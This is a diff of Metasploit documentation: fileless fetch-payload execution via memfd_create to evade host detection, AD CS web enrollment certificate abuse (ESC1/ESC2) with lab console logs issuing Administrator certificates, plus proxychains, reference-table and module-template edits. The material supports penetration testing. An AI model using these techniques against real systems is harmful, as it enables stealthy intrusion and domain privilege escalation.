The server applies rate limiting to all MCP tools using a token bucket algorithm. Default: 60 requests per minute with a burst of 10 requests. This is configurable in the `rate_limit` section of the configuration file.
### Logging
Logging is disabled by default. When enabled (via `--enable-logging` or config), sensitive data (passwords, tokens, API keys) is automatically redacted. Log files should be protected with `chmod 600`.
### Error Handling
Stack traces are never exposed to clients. Error messages are sanitized to avoid leaking credentials. Metasploit API errors are wrapped in the MCP error format.
## Testing with MCP Inspector
The [MCP Inspector](https://github.com/modelcontextprotocol/inspector) is an interactive developer tool for testing and debugging MCP servers. It runs directly through `npx`:
```
npx @modelcontextprotocol/inspector
```
## Troubleshooting
### Connection Refused or Timeout
1. Verify the RPC daemon is running: `ps aux | grep msfrpcd`
2. Check the port is listening: `netstat -an | grep 55553`
3. Test connectivity: `curl -k -v https://localhost:55553/api/`
### Authentication Failures
For MessagePack RPC, verify the username and password in your configuration file or CLI arguments. For JSON-RPC, verify the bearer token is valid and has not expired.
### Database Not Available
If database-dependent tools return errors, ensure the database is running:
```
msfdb init
msfdb start
```
Then restart the MCP server.
### Rate Limit Exceeded
Increase the rate limit in your configuration file:
```yaml
rate_limit:
requests_per_minute: 120
burst_size: 20
```
@@ -81,7 +81,7 @@ served payload is the same.
### Dependent Options
`FETCH_FILELESS` is an option that specifies a method to modify the fetch command to download the binary payload to
memory rather than disk before execution, thus avoiding some HIDS and making forensics harder. Currently, there are
two options: `bash` and `python3.8+`. Both of these require the target to be running Linux Kernel 3.17 or above.
two options: `shell`, `shell-search` and `python3.8+`. All of these require the target to be running Linux Kernel 3.17 or above.
This option is only available when the platform is Linux.
`FETCH_FILENAME` is the name you'd like the executable payload saved as on the remote host. This option is not
@@ -104,6 +104,16 @@ The remaining options will be the options available to you in the served payload
`linux/x64/meterpreter/reverse_tcp` so our only added options are `LHOST` and `LPORT`. If we had selected a different
payload, we would see different options.
### Fileless Execution
For Linux payloads, we support **fileless ELF execution** - this option is enabled with `FETCH_FILELESS`. Currently, this option can be the following values: `python3.8+`, `shell-search`, and `shell`. The basic idea behind all of them is the same: execute the payload from an anonymous file handle, which should never touch a disk, thereby adding a layer of stealth.
The `shell-search` option searches for available anonymous file handles available on the system, copies the payload into the one it finds, and executes the payload from that handle. This method uses `POSIX` commands only so that it can be run in any shell.
The `shell` option uses a slightly different approach: it runs the assembly stub from a shell, creates an anonymous file handle inside of the shell process, copies the payload into a new handle, and then runs it. Finally, it will kill the original shell process, leaving the payload running as *orphan* process. This method uses a syscall `memfd_create` to create an anonymous file handle.
This option can be used in any Linux shell.
The `python3.8+` option uses the same technique as the `shell` option. However, it all happens in Python code. It will call the `os.memfd_create` function, which will create an anonymous file handle from the Python process. Then, it uses `os.system` to copy the payload into a new file handle and execute it. This option requires Python version 3.8 or higher on the target machine.
### Generating the Fetch Payload
```msf
msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set FETCH_COMMAND WGET
@@ -14,7 +14,7 @@ Metasploit currently provides multiple options for configuring target details:
Configuring this amount of options is cumbersome and time consuming on a per module basis.
Although it is is possible to globally setting common values with the `setg` command - and to individually override the ports on a per module basis, it is still an arduous task:
Although it is possible to globally setting common values with the `setg` command - and to individually override the ports on a per module basis, it is still an arduous task:
```
setg RHOSTS x.x.x.x
@@ -1,25 +1,29 @@
## On this page
* [List of supported reference identifiers](#list-of-supported-reference-identifiers)
* [Code example of references in a module](#code-example-of-references-in-a-module)
- [On this page](#on-this-page)
- [List of supported reference identifiers](#list-of-supported-reference-identifiers)
- [Code example of references in a module](#code-example-of-references-in-a-module)
A reference in a Metasploit module is a source of information related to the module. This can be a link to the vulnerability advisory, a news article, a blog post about a specific technique the module uses, a specific tweet, etc. The more you have the better. However, you should not use this as a form of advertisement.
## List of supported reference identifiers
ID | Source | Code Example
------------- | ------------- | -------------
CVE | cvedetails.com | ```['CVE', '2014-9999']```
CWE | cwe.mitre.org | ```['CWE', '90']```
BID | securityfocus.com | ```['BID', '1234']```
MSB | technet.microsoft.com | ```['MSB', 'MS13-055']```
EDB | exploit-db.com | ```['EDB', '1337']```
US-CERT-VU | kb.cert.org | ```['US-CERT-VU', '800113']```
ZDI | zerodayinitiative.com | ```['ZDI', '10-123']```
WPVDB | wpvulndb.com | ```['WPVDB', '7615']```
PACKETSTORM | packetstormsecurity.com | ```['PACKETSTORM', '132721']```
URL | anything | ```['URL', 'http://example.com/blog.php?id=123']```
AKA (_deprecated_*) | anything | ~~`['AKA', 'shellshock']`~~
| ID | Source | Code Example |
| ------------------- | ------------------------------------------------------------------ | ---------------------------------------------------------------------------------- |
| CVE | cvedetails.com | ```['CVE', '2014-9999']``` |
| CWE | cwe.mitre.org | ```['CWE', '90']``` |
| BID | securityfocus.com | ```['BID', '1234']``` |
| MSB | technet.microsoft.com | ```['MSB', 'MS13-055']``` |
| EDB | exploit-db.com | ```['EDB', '1337']``` |
| US-CERT-VU | kb.cert.org | ```['US-CERT-VU', '800113']``` |
| ZDI | zerodayinitiative.com | ```['ZDI', '10-123']``` |
| WPVDB | wpvulndb.com | ```['WPVDB', '7615']``` |
| PACKETSTORM | packetstormsecurity.com | ```['PACKETSTORM', '132721']``` |
| GHSA | github.com/advisories or github.com/owner/repo/security/advisories | ```['GHSA', 'xxxx-xxxx-xxxx']``` or ```['GHSA', 'xxxx-xxxx-xxxx', 'owner/repo']``` |
| OSV | osv.dev | ```['OSV', 'GHSA-xxxx-xxxx-xxxx']``` |
| ATT&CK | attack.mitre.org | ```['ATT&CK', 'T1190']``` |
| URL | anything | ```['URL', 'http://example.com/blog.php?id=123']``` |
| AKA (_deprecated_*) | anything | ~~`['AKA', 'shellshock']`~~ |
> **Good to know**
> AKA names for modules are no longer stored as a reference identifier, but rather in the `Notes` metadata field as shown in the example below.
@@ -41,8 +45,10 @@ class MetasploitModule < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'Author' => [ 'Unknown' ],
'References' => [
[ 'CVE', '2014-9999' ],
['CVE', '2014-9999'],
['BID', '1234'],
['GHSA', 'xxxx-xxxx-xxxx'], # global advisory
['GHSA', 'xxxx-xxxx-xxxx', 'owner/repo'], # repository-scoped advisory
['URL', 'http://example.com/blog.php?id=123']
],
'Platform' => 'win',
@@ -444,7 +444,7 @@ Now edit the `proxychains` configuration file located at `/etc/proxychains.conf`
socks5 127.0.0.1 1080
```
The final final should look something like this:
The final file should look something like this:
```ini
# proxychains.conf VER 3.1
@@ -567,7 +567,7 @@ index.html 100%[===========================>] 57.34K --.-KB/s i
```
### Scanning
For scanning with Nmap, Zenmap, Nessus and others, keep in mind that ICMP and UPD traffic cannot tunnel through the proxy. So you cannot perform ping or UDP scans.
For scanning with Nmap, Zenmap, Nessus and others, keep in mind that ICMP and UDP traffic cannot tunnel through the proxy. So you cannot perform ping or UDP scans.
For Nmap and Zenmap, the below example shows the commands can be used. It is best to be selective on ports to scan since scanning through the proxy tunnel can be slow.
@@ -37,8 +37,6 @@ For full details:
If you already have msfconsole running, use a `reload_all` command to pick up your new modules. If not, just start msfconsole and they'll be picked up automatically. If you'd like to test with something generic, I have a module posted up as a gist, here: <https://gist.github.com/todb-r7/5935519>, so let's give it a shot:
```bash
mkdir -p $HOME/.msf4/modules/exploits/test
curl -Lo ~/.msf4/modules/exploits/test/test_module.rb https://gist.github.com/todb-r7/5935519/raw/17f7e40ab9054051c1f7e0655c6f8c8a1787d4f5/test_module.rb
todb@ubuntu:~$ mkdir -p $HOME/.msf4/modules/exploits/test
todb@ubuntu:~$ curl -Lo ~/.msf4/modules/exploits/test/test_module.rb https://gist.github.com/todb-r7/5935519/raw/6e5d2da61c82b0aa8cec36825363118e9dd5f86b/test_module.rb
% Total % Received % Xferd Average Speed Time Time Time Current
@@ -17,16 +17,16 @@ Contributing modules in [GO](https://golang.org/) can be achieved in a few simpl
import "metasploit/module"
func main() {
metadata := &module.Metadata{
Name: "<module name",
Name: "<module name>",
Description: "<describe>",
Authors: []string{"<author 1>", "<author 2>"},
Date: "<date module written",
Date: "<date module written>",
Type:"<module type>",
Privileged: <true|false>,
References: []module.Reference{},
Options: map[string]module.Option{
"<option 1": {Type: "<type>", Description: "<description>", Required: <true|false>, Default: "<default>"},
"<option 2": {Type: "<type>", Description: "<description>", Required: <true|false>, Default: "<default>"},
"<option 1>": {Type: "<type>", Description: "<description>", Required: <true|false>, Default: "<default>"},
"<option 2>": {Type: "<type>", Description: "<description>", Required: <true|false>, Default: "<default>"},
}}
module.Init(metadata, <the entry method to your module>)
@@ -151,7 +151,7 @@ Run
"id": {"type": "string"},
"method": {"enum": ["run"]},
"params": {
"type": "object"
"type": "object",
"additionalProperties": false,
"patternProperties": {
"^[^=]*$": {
@@ -181,7 +181,7 @@ Run
"id": {"type": "string"},
"result": {
"type": "object",
"required": ["message"]
"required": ["message"],
"properties": {
"message": {"type": "string"},
"return": {"type": "string"}
@@ -142,6 +142,7 @@ Optional options:
* `read-only` -- Stored tickets from the cache will be used, but no new tickets are stored.
* `write-only` -- New tickets are requested and they are stored for reuse.
* `read-write` -- Stored tickets from the cache will be used and new tickets will be stored for reuse.
* `KrbClockSkew` -- Adjust Kerberos timestamps by the given offset when talking to the KDC. Supports `s`, `m`, `h`, and `d` units and accepts negatives, e.g. `-5m` or `120s`.
* `${Prefix}KrbOfferedEncryptionTypes` -- The list of encryption types presented to the KDC as being supported by the Metasploit client. i.e. `SmbKrbOfferedEncryptionTypes=AES256`
## Ticket management
+7
View File
@@ -448,6 +448,9 @@ NAVIGATION_CONFIG = [
{
path: 'How-to-use-Metasploit-with-ngrok.md'
},
{
path: 'How-to-use-Metasploit-MCP-Server.md'
},
]
},
]
@@ -911,6 +914,10 @@ NAVIGATION_CONFIG = [
path: 'GSoC-2023-Project-Ideas.md',
title: without_prefix('GSoC')
},
{
path: 'GSoC-2026-Project-Ideas.md',
title: without_prefix('GSoC')
},
]
},
{
@@ -0,0 +1,485 @@
## Vulnerable Application
This module makes authenticated requests to an Active Directory Certificate Services Web enrollment portal to gain
a list of available templates and/or generate certificates based on the available templates.
This is the same basic action as `auxiliary/server/relay/esc8` but rather then relaying NTLM credentials, we are
authenticating with credentials we have.
## Verification Steps
### NTLM
1. Install and configure the application
* See https://docs.metasploit.com/docs/pentesting/active-directory/ad-certificates/ldap_esc_vulnerable_cert_finder.html
2. Start `msfconsole`
2. Do: `use auxiliary/admin/http/web_enrollment_cert`
3. Set the `RHOSTS` option to the AD CS Web Enrollment server
4. Set the `HTTP::Auth` option to `ntlm`
4. Set the `HttpUsername` option to a valid user
4. Set the `HttpPassword` option to a valid user password
4. Set `MODE`, `CERT_TEMPLATE`, and `TARGETURI` to the desired settings.
### Kerberos
1. Install and configure the application
* See https://docs.metasploit.com/docs/pentesting/active-directory/ad-certificates/ldap_esc_vulnerable_cert_finder.html
2. Start `msfconsole`
2. Do: `use auxiliary/admin/http/web_enrollment_cert`
3. Set the `RHOSTS` option to the AD CS Web Enrollment server
4. Set the `HTTP::Auth` option to `kerberos`
5. Set the `DOMAIN` option to the FQDN
6. Set the `DomainControllerRhost` if it is not available through DNS
4. Set the `HttpUsername` option to a valid user
4. Set the `HttpPassword` option to a valid user password
4. Set `MODE`, `CERT_TEMPLATE`, and `TARGETURI` to the desired settings.
### ESC1
1. Install and configure the application with ESC1 vulnerable template
* https://docs.metasploit.com/docs/pentesting/active-directory/ad-certificates/ldap_esc_vulnerable_cert_finder.html
2. Follow steps above based on authentication type
4. Set `MODE` to `SPECIFIC_TEMPLATE`
3. Set `CERT_TEMPLATE` to a template vulnerable to ESC1
4. Set `ALT_UPN` to the desired User
5. Set `ALT_SID` to the desired SID, if necessary
6. Set `ALT_DNS` if required
### ESC2
1. Install and configure the application with ESC2 vulnerable template
* https://docs.metasploit.com/docs/pentesting/active-directory/ad-certificates/ldap_esc_vulnerable_cert_finder.html
2. Follow steps above based on authentication type
4. Set `MODE` to `SPECIFIC_TEMPLATE`
3. Set `CERT_TEMPLATE` to a template vulnerable to ESC2
4. Set `ON_BEHALF_OF` to the desired User
5. Set `PFX` to the desired certificate file
## Options
### MODE
The issue mode. This controls what the module will do once an authenticated session is established to the Web Enrollment
server. Must be one of the following options:
* ALL: Enumerate all available certificate templates and then issue each of them
* QUERY_ONLY: Enumerate all available certificate templates but do not issue any. Not all certificate templates
available for use will be displayed; templates with the flag CT_FLAG_MACHINE_TYPE set will not show available and
include `Machine` (AKA `Computer`) and `DomainController`
* SPECIFIC_TEMPLATE: Issue the certificate template specified in the `CERT_TEMPLATE` option
### CERT_TEMPLATE
The template to issue if MODE is SPECIFIC_TEMPLATE.
## Scenarios
### Windows 2019
#### NTLM with MODE ALL
```msf
msf > use auxiliary/admin/http/web_enrollment_cert
msf auxiliary(admin/http/web_enrollment_cert) > set rhost 10.5.132.180
rhost => 10.5.132.180
msf auxiliary(admin/http/web_enrollment_cert) > set httpusername Administrator
httpusername => Administrator
msf auxiliary(admin/http/web_enrollment_cert) > set httppassword v3Mpassword
httppassword => v3Mpassword
msf auxiliary(admin/http/web_enrollment_cert) > set DOMAIN EXAMPLE
DOMAIN => EXAMPLE
msf auxiliary(admin/http/web_enrollment_cert) > set MODE ALL
MODE => ALL
msf auxiliary(admin/http/web_enrollment_cert) > set HTTP::AUTH ntlm
HTTP::AUTH => ntlm
msf auxiliary(admin/http/web_enrollment_cert) > show options
Module options (auxiliary/admin/http/web_enrollment_cert):
Name Current Setting Required Description
---- --------------- -------- -----------
ALT_DNS no Alternative certificate DNS
ALT_SID no Alternative object SID
ALT_UPN no Alternative certificate UPN (format: USER@DOMAIN)
HttpPassword v3Mpassword no The HTTP password to specify for authentication
HttpUsername Administrator no The HTTP username to specify for authentication
MODE ALL yes The issue mode. (Accepted: ALL, QUERY_ONLY, SPECIFIC_TEMPLATE)
ON_BEHALF_OF no Username to request on behalf of (format: DOMAIN\USER)
PFX no Certificate to request on behalf of
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5
h, sapni, socks4, http, socks5
RHOSTS 10.5.132.180 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /certsrv/ yes The URI for the cert server.
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
When MODE is SPECIFIC_TEMPLATE:
Name Current Setting Required Description
---- --------------- -------- -----------
CERT_TEMPLATE no The template to issue if MODE is SPECIFIC_TEMPLATE.
View the full module info with the info, or info -d command.
msf auxiliary(admin/http/web_enrollment_cert) > run
[*] Retrieving available template list, this may take a few minutes
[*] ***Templates with CT_FLAG_MACHINE_TYPE set like Machine and DomainController will not display as available, even if they are.***
[+] Available Certificates for EXAMPLE\\Administrator on : User, EFS, Administrator, EFSRecovery, ESC16_1, ESC2-Template, WebServer, SubCA, ESC1-Template
[+] Certificate generated using template User and EXAMPLE\\Administrator
[+] Certificate for EXAMPLE\\Administrator using template User saved to /home/tmoose/.msf4/loot/20260116142051_default_10.5.132.180_windows.ad.cs_263748.pfx
[+] Certificate generated using template EFS and EXAMPLE\\Administrator
[+] Certificate for EXAMPLE\\Administrator using template EFS saved to /home/tmoose/.msf4/loot/20260116142053_default_10.5.132.180_windows.ad.cs_150446.pfx
[+] Certificate generated using template Administrator and EXAMPLE\\Administrator
[+] Certificate for EXAMPLE\\Administrator using template Administrator saved to /home/tmoose/.msf4/loot/20260116142055_default_10.5.132.180_windows.ad.cs_586273.pfx
[+] Certificate generated using template EFSRecovery and EXAMPLE\\Administrator
[+] Certificate for EXAMPLE\\Administrator using template EFSRecovery saved to /home/tmoose/.msf4/loot/20260116142057_default_10.5.132.180_windows.ad.cs_077399.pfx
[+] Certificate generated using template ESC16_1 and EXAMPLE\\Administrator
[+] Certificate for EXAMPLE\\Administrator using template ESC16_1 saved to /home/tmoose/.msf4/loot/20260116142101_default_10.5.132.180_windows.ad.cs_832421.pfx
[+] Certificate generated using template ESC2-Template and EXAMPLE\\Administrator
[+] Certificate for EXAMPLE\\Administrator using template ESC2-Template saved to /home/tmoose/.msf4/loot/20260116142102_default_10.5.132.180_windows.ad.cs_548200.pfx
[+] Certificate generated using template WebServer and EXAMPLE\\Administrator
[+] Certificate for EXAMPLE\\Administrator using template WebServer saved to /home/tmoose/.msf4/loot/20260116142103_default_10.5.132.180_windows.ad.cs_191863.pfx
[+] Certificate generated using template SubCA and EXAMPLE\\Administrator
[+] Certificate for EXAMPLE\\Administrator using template SubCA saved to /home/tmoose/.msf4/loot/20260116142105_default_10.5.132.180_windows.ad.cs_300086.pfx
[+] Certificate generated using template ESC1-Template and EXAMPLE\\Administrator
[+] Certificate for EXAMPLE\\Administrator using template ESC1-Template saved to /home/tmoose/.msf4/loot/20260116142106_default_10.5.132.180_windows.ad.cs_017489.pfx
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(admin/http/web_enrollment_cert) >
```
#### Kerberos MODE:ALL
```msf
msf auxiliary(admin/http/web_enrollment_cert) > show options
Module options (auxiliary/admin/http/web_enrollment_cert):
Name Current Setting Required Description
---- --------------- -------- -----------
ALT_DNS no Alternative certificate DNS
ALT_SID no Alternative object SID
ALT_UPN no Alternative certificate UPN (format: USER@DOMAIN)
HttpPassword v3Mpassword no The HTTP password to specify for authentication
HttpUsername Administrator no The HTTP username to specify for authentication
MODE ALL yes The issue mode. (Accepted: ALL, QUERY_ONLY, SPECIFIC_TEMPLATE)
ON_BEHALF_OF no Username to request on behalf of (format: DOMAIN\USER)
PFX no Certificate to request on behalf of
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5
h, sapni, socks4, http, socks5
RHOSTS 10.5.132.180 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /certsrv/ yes The URI for the cert server.
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
When MODE is SPECIFIC_TEMPLATE:
Name Current Setting Required Description
---- --------------- -------- -----------
CERT_TEMPLATE no The template to issue if MODE is SPECIFIC_TEMPLATE.
View the full module info with the info, or info -d command.
msf auxiliary(admin/http/web_enrollment_cert) > show advanced
Module advanced options (auxiliary/admin/http/web_enrollment_cert):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN example.com yes The domain to use for Windows authentication (Must be FQDN
if HTTP:Auth is Kerberos)
DigestAlgorithm SHA256 yes The digest algorithm to use (Accepted: SHA1, SHA256)
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to
false for non-IIS servers
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
HTTP::Auth kerberos yes The Authentication mechanism to use (Accepted: auto, ntlm,
kerberos, plaintext, none)
HttpClientTimeout no HTTP connection and receive timeout
HttpRawHeaders no Path to ERB-templatized raw headers to append to existing
headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to d
isable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
SSLKeyLogFile no The SSL key log file
SSLServerNameIndication no SSL/TLS Server Name Indication (SNI)
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and S
SL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3
, TLS1, TLS1.1, TLS1.2)
ShowProgress true yes Display progress messages during a scan
ShowProgressPercent 10 yes The interval in percent that progress should be shown
UserAgent Mozilla/5.0 (Macintosh; Intel Mac no The User-Agent header to use for all requests
OS X 10_15_7) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/131.0
.0.0 Safari/537.36
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
When HTTP::Auth is kerberos:
Name Current Setting Required Description
---- --------------- -------- -----------
DomainControllerRhost 10.5.132.180 no The resolvable rhost for the Domain Controller
HTTP::Krb5Ccname no The ccache file to use for kerberos authentication
HTTP::KrbOfferedEncryptionType AES256,AES128,RC4-HMAC,DES-CBC yes Kerberos encryption types to offer
s -MD5,DES3-CBC-SHA1
HTTP::Rhostname WIN-DRC9HCDIMAT no The rhostname which is required for kerberos - the SPN
KrbCacheMode read-write yes Kerberos ticket cache storage mode (Accepted: none, re
ad-only, write-only, read-write)
View the full module info with the info, or info -d command.
msf auxiliary(admin/http/web_enrollment_cert) > run
[*] Retrieving available template list, this may take a few minutes
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143502_default_10.5.132.180_mit.kerberos.cca_557407.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143502_default_10.5.132.180_mit.kerberos.cca_545138.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[*] ***Templates with CT_FLAG_MACHINE_TYPE set like Machine and DomainController will not display as available, even if they are.***
[+] Available Certificates for on : User, EFS, Administrator, EFSRecovery, ESC16_1, ESC2-Template, WebServer, SubCA, ESC1-Template
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143520_default_10.5.132.180_mit.kerberos.cca_606180.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143520_default_10.5.132.180_mit.kerberos.cca_023162.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate generated using template User and
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143537_default_10.5.132.180_mit.kerberos.cca_548243.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143537_default_10.5.132.180_mit.kerberos.cca_843349.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate for using template User saved to /home/tmoose/.msf4/loot/20260116143538_default_10.5.132.180_windows.ad.cs_760252.pfx
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143541_default_10.5.132.180_mit.kerberos.cca_236912.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143541_default_10.5.132.180_mit.kerberos.cca_237890.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate generated using template EFS and
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143543_default_10.5.132.180_mit.kerberos.cca_360144.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143543_default_10.5.132.180_mit.kerberos.cca_009299.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate for using template EFS saved to /home/tmoose/.msf4/loot/20260116143544_default_10.5.132.180_windows.ad.cs_150360.pfx
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143546_default_10.5.132.180_mit.kerberos.cca_444407.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143547_default_10.5.132.180_mit.kerberos.cca_460069.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate generated using template Administrator and
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143548_default_10.5.132.180_mit.kerberos.cca_941754.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143549_default_10.5.132.180_mit.kerberos.cca_484741.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate for using template Administrator saved to /home/tmoose/.msf4/loot/20260116143549_default_10.5.132.180_windows.ad.cs_088506.pfx
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143552_default_10.5.132.180_mit.kerberos.cca_665940.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143552_default_10.5.132.180_mit.kerberos.cca_324874.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate generated using template EFSRecovery and
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143554_default_10.5.132.180_mit.kerberos.cca_559229.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143554_default_10.5.132.180_mit.kerberos.cca_295382.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate for using template EFSRecovery saved to /home/tmoose/.msf4/loot/20260116143554_default_10.5.132.180_windows.ad.cs_477946.pfx
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143556_default_10.5.132.180_mit.kerberos.cca_645978.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143557_default_10.5.132.180_mit.kerberos.cca_838211.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate generated using template ESC16_1 and
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143558_default_10.5.132.180_mit.kerberos.cca_485891.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143559_default_10.5.132.180_mit.kerberos.cca_709913.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate for using template ESC16_1 saved to /home/tmoose/.msf4/loot/20260116143559_default_10.5.132.180_windows.ad.cs_818976.pfx
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143601_default_10.5.132.180_mit.kerberos.cca_952232.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143601_default_10.5.132.180_mit.kerberos.cca_169000.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate generated using template ESC2-Template and
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143603_default_10.5.132.180_mit.kerberos.cca_042983.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143603_default_10.5.132.180_mit.kerberos.cca_512322.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate for using template ESC2-Template saved to /home/tmoose/.msf4/loot/20260116143604_default_10.5.132.180_windows.ad.cs_206522.pfx
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143607_default_10.5.132.180_mit.kerberos.cca_893032.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143607_default_10.5.132.180_mit.kerberos.cca_156631.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate generated using template WebServer and
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143608_default_10.5.132.180_mit.kerberos.cca_982799.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143609_default_10.5.132.180_mit.kerberos.cca_247412.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate for using template WebServer saved to /home/tmoose/.msf4/loot/20260116143609_default_10.5.132.180_windows.ad.cs_955795.pfx
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143612_default_10.5.132.180_mit.kerberos.cca_119902.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143613_default_10.5.132.180_mit.kerberos.cca_847610.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate generated using template SubCA and
